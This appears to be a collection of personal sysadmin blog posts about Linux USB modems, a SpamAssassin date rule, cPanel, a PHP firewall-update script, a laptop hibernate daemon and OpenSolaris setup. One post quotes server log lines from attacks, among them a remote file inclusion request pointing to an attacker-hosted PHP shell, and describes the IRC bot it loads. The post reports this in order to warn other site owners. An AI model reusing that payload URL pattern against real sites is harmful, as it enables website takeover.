Suddenly the Dungeon collapses!! - You die...


wimax is not an option (not available) so I chose cell usb modem from Telenor
data plan is prepaid, 3 GB for two months (a new year promotion that ends tomorrow)

I thought I was getting Huawei E1550 but I ended up with Huawei E620
that modem is not on their website (listed usb modems) nor in the manual I got with the thing
the manual talks about Huawei E1550

now why do I care so much about exact models? well because modem should run on my linux box
I saw Huawei E220 was well supported and Huawei E1550 had some glitches but could be made to work

first I used usb modem in Windows so that the autorun process can install device drivers
that’s just how it works the first time

in linux, I first installed usb-modeswitch package

lsusb wrote that it was Huawei E620 with id 12d1:1001

but after searching for that ID I found references to Huawei E169 with that same id?!

on the plus side ubuntu Network Manager Applet works great with this modem
I defined a new connection, specified my country and mobile network provider and it just worked!

the problematic rule is FH_DATE_PAST_20XX

just find 72_active.cf file and replace ‘/20[1-9][0-9]/’ to for example ‘/20[2-9][0-9]/’

now, the problem year is 2020 but by then your file will probably get overwritten by your distribution

you can put whatever number instead of 1, not just 2 and make it work longer

or simpler, edit your local.cf and set this rule to have zero score

score FH_DATE_PAST_20XX 0.0

once your distribution fixes this just remove local.cf entry

today, Uros Nedic, the guy doing the lecture, arrived a bit late but I managed to find a beautiful park behind the institute with a great view of the Danube river

I had a nice time today

we were learning about Sun OS processes, threads, LWM, kthreads, DTrace, Zones and ZFS

Uros was great while teaching us/giving a lecture, answered all of our questions

I learned a lot

now, here are some pictures I took with my mobile phone, sorry for the bad quality

first, I couldn’t update cpanel to latest stable because one perl module, NetAddr::IP wouldn’t install

the problem was, a configure script had a malformed first line #! /bin/bash (notice the extra space after the ! character)

that got fixed

now, I have problems with cpanel license when I reboot, it says license is not valid

I have to run /usr/local/cpanel/cpkeyclt to get it fixed

I’ll report it to them but I could also easily just add it to rc.local

don’t get me wrong, I still really like cpanel but I hate issues when dealing with a new box

but for those with dynamic ip addresses I had to figure out a different solution

so I made a small script in PHP to check for my friends dynamic ip address by looking up his dyndns.org hostname

it checks IP then goes sleeping for 5 minutes

when it detects an ip change it updates firewall by flushing my firends chain and adding a rule to let him access my webserver

this script works in my firewall iptables setup, it could work on yours but you have to be smart and figure that out for yourself, I’m not giving any guaranteess for this, use it as GPL V3 code
if you want me to help you set it up, just contact me

here’s the code:

#!/usr/bin/php
<?php
/*
use this code as GPL V3 licence says
Copyright (C) 2008, Miroslav Madzarevic, All Rights Reserved
*/
$old_ip = '';

while (1) {

    sleep (300);

    $host = 'friend.dyndns.org';

    if (!preg_match('/^'.$host.' has address ((?:\d{1,3}\.){3}\d{1,3})$/',
           exec ("/usr/bin/host $host"), $matches)) {
        echo "IP problems\n";
        continue;
    }

    $ip = $matches[1];

    $ip_parts = preg_split ('/\./', $ip, -1, PREG_SPLIT_NO_EMPTY);

    if (count($ip_parts) != 4) {
        echo "wrong ip parts count\n";
        exit;
    }

    $good = array();

    foreach ($ip_parts as $ip_part) {
        $ip_part = (int) $ip_part;
        if ($ip_part < 1 or $ip_part > 254) {
            echo "wrong ip part, $ip_part\n";
            exit;
        }
        $good[] = $ip_part;
    }

    $new_ip = join('.', $good);

    if ($old_ip != $new_ip) {

        `/sbin/iptables -F friend`;

        `/sbin/iptables -A friend -s $new_ip/32 -p tcp -m tcp --dport 80 -j ACCEPT`;

        $old_ip = $new_ip;
    }
}

?>

I first started with security running mod_suphp and while it worked fine it lacked the speed of the DSO php (mod_php)

so I read a thing or two about fastcgi and enabled it

I’m pleasantly surprised by the speed of the hosting

each user got its own persistent php application running requests (actually it’s limited to 500 php requests per php5 process by MaxRequestsPerProcess 500 directive)

I’m keeping an eye about the memory consumption but I hope I’ll be able to keep running with this setup

and while I got php running as the actuall cPanel user, apache is still running as nobody for other requests… hmmm… I’m using apache 2.2 with MPM Prefork… maybe I should try a different MPM?

so I thought I’d make myself a daemon program that will automatically put my computer to hibernate when my laptop battery is almost empty

usually I take care that my battery doesn’t get to the red zone but this is for those few cases I forget

I wrote this small programm in C++

why c++

well because I don’t programm in c++ and I found it interesting to do so

main.cpp looks like this

so, you see the locations of the info and state file for the laptop battery, the percent at which we go to hibernation (I’ve set it to 12%), and the sleep interval before checking the battery state again (10 seconds)

I use my own hibernate script but you could use something like /usr/sbin/hibernate

you can change all of these

in the main function you can se that:

• we work only as a root user
• we daemonize (detach from the terminal and run in background)
• instantiate a worker class object
• and do our work

and what is our work? check out this picture

well we get the battery total capacity and current capacity and then we calculate the percent

if the percent is less that what I want (12%) then I want my laptop to go to hibernaton

but I also made a security check (that you can remove if you like)

that makes sure my laptop doesn’t go twice into hibernation in succession

why did I do that?

well because I parse data from some files I have no influence over

and those files can change their format anytime

so this is just a precaution

I have a simple makefile that compiles this code, copies it to /usr/local/bin/medved (medved in my language means a bear and bears hibernate ) and adds an entry to /etc/rc.local so that it starts next time you reboot your box automatically

you can also start it by hand and see how it works before the reboot

and that’s it, now I have a daemon that puts my laptop to hibernation before my battery runs dry

I’ve published the source code under GPL licence version 3

you can get source code here

wherever there are people, there are good and bad people

lets talk about bad people on the internet misusing osadmin.com

what do they do?

a couple of things

some do referrer poisoning

it’s a technique where they visit your website or just ask for parts of it (images etc.) using fake referrers

why do they do it?

well they hope their website (or their website URL) will turn out in your web statistics software and you’ll click there

they’re just spammers that want you to go there and read an ad or possibly get infected by a virus or similar

next there are people who steal your content

I said on my website that all of this is copyrighted by me

but they have automatic bots, programs, that search the web for blogs and other stuff and steal content

some of them, the more decent ones, just use like 2 lines or so from my website and link to my website

but some of them use all the text from a blog article without mentioning the source

like this one

Host: 70.94.6.217 /mire_blog/wp-includes/images/smilies/icon_smile.gif
Http Code: 200 Date: Apr 14 22:27:48 Http Version: HTTP/1.1 Size in Bytes: 174
Referer: http://weblog.xanga.com/lyudi/652178887/waiting-the-water.html
Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322)


here you see his ip address, the url he tried to open on my website (the smiley icon), date when he did it and the referrer
when you actually go there you see my content without the link to my website but before that, he grays the screen and asks for your email address so he can spam you a bit more
oh yeah, and that user agent (mozilla etc.) is fake also

and then there are those who try to break my website by using wordpress crack programs
they are called script kiddies because they use cracking programs somebody else wrote
most of them are teenagers that instead of getting high by thinking about chicks get high on breaking and destroying other people’s websites

now, here’s an example

/category/rss.php?phpraid_dir=http://mcleanmkting.com/catalog/images/default/iyes.txt??
Http Code: 302 Date: Apr 15 01:28:10 Http Version: HTTP/1.1 Size in Bytes: 468
Referer: -
Agent: libwww-perl/5.808


here you see this client asked for my rss and he provided a parameter called phpraid_dir with the url http://mcleanmkting.com/catalog/images/default/iyes.txt??
that means he tried to use that url as an include file in my website script
that is not a text file but a program, a php file that tries to see which of the shell commands work on my system
in also reports which operating system I am using, disk free space etc.

then, it tries to load a perl script from the url http://mcleanmkting.com/catalog/images/default/hai.txt using various download methods because they don’t know which ones work on my system

this perl script is meant to take over the website and to report to the cracker on IRC so he can use the IRC to control my website

the program accepts instructions from nicks sec or SNapper and it communicates with them via IRC private messaging

it’s got a watcher for milw0rm rss feed, tcp/udp flooder, portscan, log destroyer, emailer etc.

I’m a programmer/sysadmin so those tricks will not be so successful on me/my website as they might be on the others because I update my software and track my website activity

I’ve always been a whitehat, meaning I try to make websites work and I write code to do some work

instead those people are blackhat, crackers trying to destroy your website for their own personal benefit

and they’re getting worse by the day

I hope this has been informative, check back osadmin.com for more later

The DVD I got is released quarterly and can be found here.

I dediced to try it out. The install process was simple but it lasted forever, I couldn’t believe it was over when it finished. Well actually it wasn’t really finished, because after booting it for the first time it took like 10 minutes to actually start the GUI.

OpenSolaris really isn’t a polished product. At least from a standpoint of a desktop user.

My screen was in the correct resolution, and the nvidia drivers were there but the refresh rate was like 50 Hz instead of 60Hz.

Next, I found out my network card was not working… I searched the internet for VIA Rhine II and found drivers here. Next, I found out resolv.conf file did not even exist

I created one, populated some name servers and set up the default gateway to my router.

But again I was out of luck, dig tool was working but I couldn’t connect to any site on the net. With some googleing I found out I had to copy nsswitch.dns to nsswitch.conf

Wow, talk about a user friendly OS

I found a good package repository run by the Blastwave guys. Check it out.

I named my OpenSolaris Horus. Horus was the Egypt’s Sun God at the time the pharaohs ruled.

Now, I’m running vncserver on Solaris that I use via vncviewer from my Ubuntu GNU/Linux laptop.

Here’s a picture of it through my vncviewer. I’m running fluxbox window manager btw